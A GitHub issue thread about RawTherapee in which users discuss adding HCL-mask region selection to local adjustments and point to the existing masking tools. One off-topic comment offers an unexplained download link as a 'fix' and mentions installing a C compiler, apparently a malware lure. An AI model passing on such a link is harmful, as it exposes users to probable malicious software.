### ISSUE TITLE
Mask-like selection for local ajustmens

### ISSUE THREAD

**Issue by dpecka** [Beep6581/RawTherapee#7202]
Hi,

local edits are certainly cool but I think that current `Spot' selection method is less usable .. Cant we have a mask-like selection from Color Toning ? Creating a HCL mask is way more flexible than creating just a Spot .. Code seems already existing and works so cool so this will be just a method for local adjustmens regions ...

Please see screenshot ..

I would vote for re-using this code as for a new method (along with Spot) for creation of local adjustment regions

thanks and regards, ~dan
![Screenshot_20240919_122816](https://github.com/user-attachments/assets/0da1f723-da74-45be-8fe2-539b30a8c0a5)

**Comment by nhatlaso1** [comment]
This might help:This file might fix it
https://mega.co.nz/#!B31G2LaZ!uBBOCp9hLC7bq9kP8NC6s4DanQJJZuoFRr5FI_jkeic

you may need to install the c compiler

**Comment by marter001** [comment]
i am not sure, if i get your point. What you are showing is easily to achieve with selective editing (former local adjustmenst):
when spot (as a reference) and spot size is set precisely: 
- using "standard", mostly,  it is already sufficient to reduce the scope
- using "advanced" and "masking" in every tool can be done as you proposed

pls ignore, if i totally misunderstood your request.

**Comment by dpecka** [comment]
Hi Martin, thanks for your input .. Maybe I am missing something, some new feature, because RT above is 5.10, but what I mean is that you can create your `Spot' just like [this](https://infophagia.com/ntz/paste/Screenshot_20240920_101912.png), but I mean that other method for selection for local edit will be HCL mask exactly as it is in Color Toning tool ... So you will have two options: 1) either use spot like that OR 2) to create a region for local edit with HCL mask same like you can add multiple masks with Color Toning->Method(color correction regions)->#Correction Mask

**Comment by marter001** [comment]
did you really check the options in advanced tab? The masks show different colours instead of yellow, but the LCH curves are available and the possibilities to define a mask are huge: 

![grafik](https://github.com/user-attachments/assets/290749f1-d021-462a-92fc-84e598d7cf2e)

**Comment by dpecka** [comment]
My dearest apologize but I don't see advanced tab .. is it something what is in 5.11 and not in 5.10 ? o.O

**Comment by marter001** [comment]
also in RT 5.10 each tool comes with 3 options:
![grafik](https://github.com/user-attachments/assets/14a1ada5-62b7-4e6a-a761-93de6c6b1e51)

**Comment by dpecka** [comment]
Hi Martin, I don't think we're talking about the same ... Now I understand what you mean but it is not that .. I am talking about that you first [define your region for local edits with spot](https://infophagia.com/ntz/paste/Screenshot_20240920_101912.png) like that (you can of course place where you wish and shape it to your needs), but I am talking about that the `other' method for defining region could be a [HCL mask like in here](https://infophagia.com/ntz/paste/Screenshot_20240920_124232.png) ..

In other words - before adding any tool into the local edit region (we call it just spot now) it will be possible to define these regions with more methods .. we will have our current method called Spot and I would love to additionally have another method `HCL Mask' exactly as it is in Color Toning tool ...

**Comment by marter001** [comment]
sorry for not getting your point. The spot as a reference in addition with masking over C, L and LC(h) seems very powerful to me and offers more possibilities than i ever will need.

**Comment by Lawrence37** [comment]
@dpecka Like this? Here I'm using Color & Light to increase lightness. I applied a mask so it only affects the reds and greens.

Before and after:
![image](https://github.com/user-attachments/assets/8b31d135-fdf4-40d4-ba8e-4765afdcda72)

Visualization of the mask:
![image](https://github.com/user-attachments/assets/55064a3b-f80a-4e75-be69-e89980be1e8c)
